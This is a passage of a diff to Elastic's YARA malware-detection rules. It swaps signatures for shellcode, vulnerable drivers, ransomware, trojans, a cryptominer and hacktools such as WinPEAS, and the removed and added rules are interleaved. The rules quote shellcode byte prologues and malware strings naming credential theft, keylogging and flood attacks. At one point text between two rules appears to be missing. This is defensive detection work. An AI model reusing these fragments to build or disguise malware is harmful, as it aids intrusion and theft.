"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2" + logic_hash = "a67679bb2f23d1f6691c9ad23da1fd4c2402701ba1929c7abf078d7d95011a08" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2da9f0fc05bc8e23feb33b27142f46fb437af77766e39889a02ea843d52d17eb" + fingerprint = "43c7f0dfe43c64d644fcb0171433a8af0f7b4c38f7601d42923762c3d882ac31" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 6F 72 6D 61 6C 2F 69 33 38 36 2F 56 53 44 6F 77 6E 6C 6F 61 64 65 72 2E 6F 00 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 44 00 69 00 76 00 65 00 72 00 74 00 2E 00 73 00 79 00 73 00 00 00 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $original_file_name } -rule ELASTIC_Windows_Shellcode_Generic_8C487E57 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Marvinhw_37326842 : FILE { meta: - description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" + description = "Subject: Marvin Test Solutions, Inc., Name: HW.sys, Version: 4.9.8.0" author = "Elastic Security" - id = "8c487e57-4b8c-488e-a1d9-786ff935fd2c" - date = "2022-05-23" - modified = "2022-07-18" + id = "37326842-66a3-4058-abb7-d6d48ca58831" + date = "2022-07-21" + modified = "2022-07-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Shellcode_Generic.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a86ea8e15248e83ce7322c10e308a5a24096b1d7c67f5673687563dec8229dfe" - score = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_MarvinHW.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5" + logic_hash = "f37290912ab7d997d718c074eef48a67a36444e9e97592b6be65855ade2ba246" + score = 50 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4" + tags = "FILE" + fingerprint = "f0ac8176d412dfaeb9c37ce18c13dea7cc2783fd37421b69e19c4dfa898e42be" + threat_name = "Windows.VulnDriver.MarvinHW" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a = { FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 } + $subject_name = { 06 03 55 04 03 [2] 4D 61 72 76 69 6E 20 54 65 73 74 20 53 6F 6C 75 74 69 6F 6E 73 2C 20 49 6E 63 2E } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 48 00 57 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x09][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x08][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x08][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x09][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x07][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $subject_name and $original_file_name and $version } -rule ELASTIC_Windows_Shellcode_Generic_F27D7Beb : FILE MEMORY +rule ELASTIC_Linux_Trojan_Zpevdo_7F563544 : FILE MEMORY { meta: - description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" + description = "Detects Linux Trojan Zpevdo (Linux.Trojan.Zpevdo)" author = "Elastic Security" - id = "f27d7beb-5ce0-4831-b1ad-320b346612c3" - date = "2022-06-08" - modified = "2022-09-29" + id = "7f563544-4ef3-460f-9a36-23d086f9c421" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Shellcode_Generic.yar#L20-L37" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8530a74a002d0286711cd86545aff0bf853de6b6684473b6211d678797c3639f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Zpevdo.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "9cbbb5a9166184cef630d1aba8fec721f676b868d22b1f96ffc1430e98ae974c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3f8dd6733091ec229e1bebe9e4cd370ad47ab2e3678be4c2d9c450df731a6e5c" + fingerprint = "a2113b38c27ee7e22313bd0ffbcabadfbf7f3f33d241a97db2dc86299775afd6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 53 48 89 E3 66 83 E4 00 48 B9 [8] BA 01 00 00 00 41 B8 00 00 00 00 48 B8 [8] FF D0 48 89 DC 5B C3 } + $a = { 55 48 89 E5 48 83 EC 20 89 7D EC 48 89 75 E0 BE 01 00 00 00 BF 11 00 } condition: all of them } -rule ELASTIC_Windows_Shellcode_Generic_29Dcbf7A : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Glckio_39C4Abd4 : FILE { meta: - description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" + description = "Detects Windows Vulndriver Glckio (Windows.VulnDriver.GlckIo)" author = "Elastic Security" - id = "29dcbf7a-2d3b-4e05-a2be-15623bf62d06" - date = "2023-05-09" - modified = "2023-06-13" + id = "39c4abd4-0c14-49e6-ab5c-edc260d28666" + date = "2022-04-04" + modified = "2022-08-30" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Shellcode_Generic.yar#L39-L56" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c2a81cc27e696a2e488df7d2f96784bbaed83df5783efab312fc5ccbfd524b43" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_GlckIo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25" + logic_hash = "fd43503c9427a386674c06bb790e110ac23c27d8fc4adedbaa8a9b7cb0cbafd4" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e4664ec7bf7dab3fff873fe4b059e97d2defe3b50e540b96dd98481638dcdcd8" - severity = 100 + tags = "FILE" + fingerprint = "80971a85f52d52dd80f1887b5b4fc2e101886e60b78b08ca9bb8f781db9f9751" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { FC 48 83 E4 F0 41 57 41 56 41 55 41 54 55 53 56 57 48 83 EC 40 48 83 EC 40 48 83 EC 40 48 89 E3 } + $str1 = "\\GLCKIO2.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $str1 } -rule ELASTIC_Windows_Vulndriver_Vmdrv_7C674F8E : FILE +rule ELASTIC_Windows_Vulndriver_Glckio_68D5Afbb : FILE { meta: - description = "Name: vmdrv.sys, Version: 10.0.10011.16384" + description = "Detects Windows Vulndriver Glckio (Windows.VulnDriver.GlckIo)" author = "Elastic Security" - id = "7c674f8e-720c-48ee-9644-5566493d2546" - date = "2022-04-07" - modified = "2022-04-07" + id = "68d5afbb-a90e-404a-8e77-4b0f9d72934c" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Vmdrv.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351" - logic_hash = "87f29b861d5239c60e44541fe31ed90696068225b1b6d824dc9b06fcdb1597ae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_GlckIo.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a" + logic_hash = "0b5f0d408a5c4089ef496c5f8241a34d0468cc3d21e89e41dc105a0df0855d38" score = 75 quality = 75 tags = "FILE" - fingerprint = "a1ce2c56e5c99aae124d0404750eb8cc970291e8e10cb0c81c8c618eb778c343" - threat_name = "Windows.VulnDriver.Vmdrv" + fingerprint = "98b25bf15be40dcd9cedbce6d50551faa968ac0e8259c1df0181ecb36afc69dd" severity = 50 arch_context = "x86" scan_context = "file" @@ -60940,240 +61915,199 @@ rule ELASTIC_Windows_Vulndriver_Vmdrv_7C674F8E : FILE os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 6D 00 64 00 72 00 76 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\x00][\x00-\x40]|[\x00-\xff][\x00-\x3f])([\x00-\x1b][\x00-\x27]|[\x00-\xff][\x00-\x26])|([\x00-\xff][\x00-\xff])([\x00-\x09][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x0a][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x1a][\x00-\x27]|[\x00-\xff][\x00-\x26]))/ + $str1 = "[GLKIO2] Cannot resolve ZwQueryInformationProcess" condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $str1 } -rule ELASTIC_Windows_Ransomware_Egregor_F24023F3 : BETA FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Camelot_9Ac1654B : FILE MEMORY { meta: - description = "Identifies EGREGOR (Sekhemt) ransomware" + description = "Detects Linux Cryptominer Camelot (Linux.Cryptominer.Camelot)" author = "Elastic Security" - id = "f24023f3-c887-42fc-8927-cdbd04b5f84f" - date = "2020-10-15" - modified = "2021-08-23" - reference = "https://www.bankinfosecurity.com/egregor-ransomware-adds-to-data-leak-trend-a-15110" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Egregor.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "5695b44f6ce018a91a99b6c94feae740ff4ac187e232bc9044e51d62d1f42bfa" + id = "9ac1654b-f2f0-4d32-8e2a-be30b3e61bb0" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Camelot.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "5de1f43803f3d3b94149ea39ed961e7b9a1ad86c15c5085e2e0a5f9c314e98ff" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "3a82a548658e0823678ec9d633774018ddc6588f5e2fbce74826a46ce9c43c40" - threat_name = "Windows.Ransomware.Egregor" + tags = "FILE, MEMORY" + fingerprint = "156c60ee17e9b39cb231d5f0703b6e2a7e18247484f35e11d3756a025873c954" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "M:\\sc\\p\\testbuild.pdb" ascii fullword - $a2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" wide fullword - $a3 = "nIcG`]/h3kpJ0QEAC5OJC|
NIGHT SKY
" ascii fullword + $a4 = "URL:https://contact.nightsky.cyou" ascii fullword condition: - all of them + 2 of them } -rule ELASTIC_Windows_Trojan_Netwire_1B43Df38 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Nightsky_253C4D0D : FILE MEMORY { meta: - description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" + description = "Detects Windows Ransomware Nightsky (Windows.Ransomware.Nightsky)" author = "Elastic Security" - id = "1b43df38-886e-4f58-954a-a09f30f19907" - date = "2021-06-28" - modified = "2021-08-23" - reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Netwire.yar#L22-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e6f446dbefd4469b6c4d24988dd6c9ccd331c8b36bdbc4aaf2e5fc49de2c3254" - logic_hash = "bb0eb1c1969bc1416e933822843293c5d41bf9bc3d402fa5dbdc3cdf2f4b394a" + id = "253c4d0d-157f-4929-9f0e-5830ebc377dc" + date = "2022-03-14" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Nightsky.yar#L24-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c940a35025dd3847f7c954a282f65e9c2312d2ada28686f9d1dc73d1c500224" + logic_hash = "ba9e6dab664e464e0fdc65bd8bdccc661846d85e7fd8fbf089e72e9e5b71fb17" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4142ea14157939dc23b8d1f5d83182aef3a5877d2506722f7a2706b7cb475b76" + fingerprint = "739529dfb1f8c8ab2a7f6a4b2b18b27dd2fcc38eda0f110897fc6cb5d64b1c92" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64139,94 +65124,86 @@ rule ELASTIC_Windows_Trojan_Netwire_1B43Df38 : FILE MEMORY os = "windows" strings: - $a1 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword - $a2 = "\\Login Data" - $a3 = "SOFTWARE\\NetWire" fullword + $a1 = { 43 B8 48 2B D9 49 89 43 C0 4C 8B E2 49 89 43 C8 4C 8B F1 49 89 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Netwire_F85E4Abc : FILE MEMORY +rule ELASTIC_Linux_Trojan_Bedevil_A1A72C39 : FILE MEMORY { meta: - description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" + description = "Detects Linux Trojan Bedevil (Linux.Trojan.Bedevil)" author = "Elastic Security" - id = "f85e4abc-f2d7-491b-a1ad-a59f287e5929" - date = "2022-08-14" - modified = "2022-09-29" - reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Netwire.yar#L45-L64" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ab037c87d8072c63dc22b22ff9cfcd9b4837c1fee2f7391d594776a6ac8f6776" - logic_hash = "af8fc8fff2e1a0b6c87ac6d24fecf2e1cefe6313ec66da13fddd1be25c1c3d92" + id = "a1a72c39-c8a3-4372-bd1d-de6360c9c19e" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Bedevil.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "017a9d7290cf327444d23227518ab612111ca148da7225e64a9f6ebd253449ab" + logic_hash = "227adcc340c38cebf56ea2f39b483c965dd46827d83afe5f866ca844c932da76" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "66cae88c9f8b975133d2b3af94a869244d273021261815b15085c638352bf2ca" + fingerprint = "ea4762d6ba0b88017feda1ed68d70bedd1438bb853b8ee1f83cbca2276bfbd1e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { C9 0F 44 C8 D0 EB 8A 44 24 12 0F B7 C9 75 D1 32 C0 B3 01 8B CE 88 44 } + $a = { 73 3A 20 1B 5B 31 3B 33 31 6D 25 64 1B 5B 30 6D 0A 00 1B 5B } condition: all of them } -rule ELASTIC_Windows_Trojan_Netwire_F42Cb379 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Shark_B918Ab75 : FILE MEMORY { meta: - description = "Detects Windows Trojan Netwire (Windows.Trojan.Netwire)" - author = "Elastic Security" - id = "f42cb379-ac8c-4790-a6d3-aad6dc4acef6" - date = "2022-08-14" - modified = "2022-09-29" - reference = "https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Netwire.yar#L66-L90" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ab037c87d8072c63dc22b22ff9cfcd9b4837c1fee2f7391d594776a6ac8f6776" - logic_hash = "fc1436596987d3971a464e707ee6fd5689e7d2800df471c125c1e3f748537f5d" + description = "Detects Linux Trojan Shark (Linux.Trojan.Shark)" + author = "Elastic Security" + id = "b918ab75-0701-4865-b798-521fdd2ffc28" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Shark.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8b6fe9f496996784e42b75fb42702aa47aefe32eac6f63dd16a0eb55358b6054" + logic_hash = "16302c29f2ae4109b8679933eb7fd9ef9306b0c215f20e8fff992b0b848974a9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a52d2be082d57d07ab9bb9087dd258c29ef0528c4207ac6b31832f975a1395b6" + fingerprint = "15205d58af99b8eae14de2d5762fdc710ef682839967dd56f6d65bd3deaa7981" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "http://%s%ComSpec" ascii fullword - $a2 = "%c%.8x%s" ascii fullword - $a3 = "%6\\6Z65dlNh\\YlS.dfd" ascii fullword - $a4 = "GET %s HTTP/1.1" ascii fullword - $a5 = "R-W65: %6:%S" ascii fullword - $a6 = "PTLLjPq %6:%S -qq9/G.y" ascii fullword + $a = { 26 00 C7 46 14 0A 00 00 00 C7 46 18 15 00 00 00 EB 30 C7 46 14 04 00 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_66197D54 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Darkcomet_1Df27Bcc : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, application module" + description = "Detects Windows Trojan Darkcomet (Windows.Trojan.Darkcomet)" author = "Elastic Security" - id = "66197d54-3cd2-4006-807d-24d0e0d9e25a" - date = "2022-12-21" - modified = "2023-02-01" + id = "1df27bcc-9f18-48d4-bd7f-73bdc7cb1e63" + date = "2021-08-16" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "7bccf37960e2f197bb0021ecb12872f0f715b674d9774d02ec4e396f18963029" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Darkcomet.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7fbe87545eef49da0df850719536bb30b196f7ad2d5a34ee795c01381ffda569" + logic_hash = "5886e3316839e64f934a0e84d85074e076f3e1e44f86fee35a87eb560bfa2aa7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "951f0ca036a0ab0cf2299382049eecb78f35325470f222c6db90a819b9414083" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "63b77999860534b71b7b4e7b3da9df175ccd0009f4c13215a59c6b83e0e95b3b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64234,36 +65211,32 @@ rule ELASTIC_Windows_Hacktool_Winpeas_Ng_66197D54 : FILE MEMORY os = "windows" strings: - $win_0 = "Possible DLL Hijacking, folder is writable" ascii wide - $win_1 = "FolderPerms:.*" ascii wide - $win_2 = "interestingFolderRights" ascii wide - $win_3 = "(Unquoted and Space detected)" ascii wide - $win_4 = "interestingFolderRights" ascii wide - $win_5 = "RegPerms: .*" ascii wide - $win_6 = "Permissions file: {3}" ascii wide - $win_7 = "Permissions folder(DLL Hijacking):" ascii wide + $a1 = "BTRESULTHTTP Flood|Http Flood task finished!|" ascii fullword + $a2 = "is now open!|" ascii fullword + $a3 = "ActiveOnlineKeylogger" ascii fullword + $a4 = "#BOT#RunPrompt" ascii fullword + $a5 = "GETMONITORS" ascii fullword condition: - 4 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_E8Ed269C : FILE MEMORY +rule ELASTIC_Windows_Trojan_Hijackloader_A8444812 : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, checks module" + description = "Detects Windows Trojan Hijackloader (Windows.Trojan.HijackLoader)" author = "Elastic Security" - id = "e8ed269c-3191-44c0-a9c6-55172fb59c8c" - date = "2022-12-21" - modified = "2023-02-01" + id = "a8444812-6aef-4ed7-a44b-b147301544c8" + date = "2023-11-15" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L29-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "c56b6dfb2c3ae657615c825a4d5d5640c2204fa4217262e1ccb4359d5a914a63" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_HijackLoader.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "065c379a33ef1539e8a68fd4b7638fe8a30ec19fc128642ed0c68539656374b9" + logic_hash = "6cd88adc7a0d35013a26d1135efb294ee6f9ddab99b4549e82d3d6f5f65509b6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7b6ede4d95b2d6d2a43e729365adb9de3fde74ed731cafdb88916ac3925f9164" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "dd9f3bca44b585e3a31626b66223288634fcb092e43ecb053806726e5f2006e9" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64271,192 +65244,147 @@ rule ELASTIC_Windows_Hacktool_Winpeas_Ng_E8Ed269C : FILE MEMORY os = "windows" strings: - $win_0 = "systeminfo" ascii wide - $win_1 = "Please specify a valid log file." ascii wide - $win_2 = "argument present, redirecting output" ascii wide - $win_3 = "max-regex-file-size" ascii wide - $win_4 = "-lolbas" ascii wide - $win_5 = "[!] the provided linpeas.sh url:" ascii wide - $win_6 = "sensitive_files yaml" ascii wide - $win_7 = "Getting Win32_UserAccount" ascii wide - $win_8 = "(local + domain)" ascii wide - $win_9 = "Creating AppLocker bypass" ascii wide + $a1 = { 8B 45 ?? 40 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 03 45 ?? 66 0F BE 00 66 89 45 ?? FF 75 ?? FF 75 ?? 8D 45 ?? 50 E8 [4] 83 C4 0C EB ?? } + $a2 = { 8B 45 ?? 8B 4D ?? 8B [1-5] 0F AF [1-5] 0F B7 [2] 03 C1 8B 4D ?? 89 01 } + $a3 = { 33 C0 40 74 ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? FF 75 ?? FF 75 ?? E8 [4] 59 59 89 45 ?? 8B 45 ?? 8B 4D ?? 0F B7 04 41 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 45 ?? EB ?? 8B 45 ?? 40 89 45 ?? EB ?? } + $a4 = { 8B 45 ?? 8B 4D ?? 8B [1-5] 0F AF [1-5] 0F B7 4D ?? 03 C1 8B 4D ?? 89 01 } + $a5 = { 8B 45 ?? 83 C0 04 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 8B 4D ?? 8B 04 81 03 45 ?? 8B 4D ?? 8B 55 ?? 89 04 8A 8B 45 ?? 40 89 45 ?? EB ?? } + $a6 = { 8B 45 ?? 83 C0 04 89 45 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 45 ?? 03 45 ?? 89 45 ?? 8B 45 ?? 8B 00 89 45 ?? 8B 45 ?? 33 45 ?? 8B 4D ?? 89 01 EB ?? } condition: - 5 of them + 3 of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_413Caa6B : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Infectionmonkey_6C84537B : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, event module" + description = "Detects Linux Hacktool Infectionmonkey (Linux.Hacktool.Infectionmonkey)" author = "Elastic Security" - id = "413caa6b-90b7-4763-97b3-49aeb5a97cf6" - date = "2022-12-21" - modified = "2023-02-01" + id = "6c84537b-6aa1-40d5-b14c-f78d7e67823d" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L59-L87" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "4f2417d61be5e68630408a151cd73372aef9e7f4638acf4e80bfa5b2811119a7" + source_url = 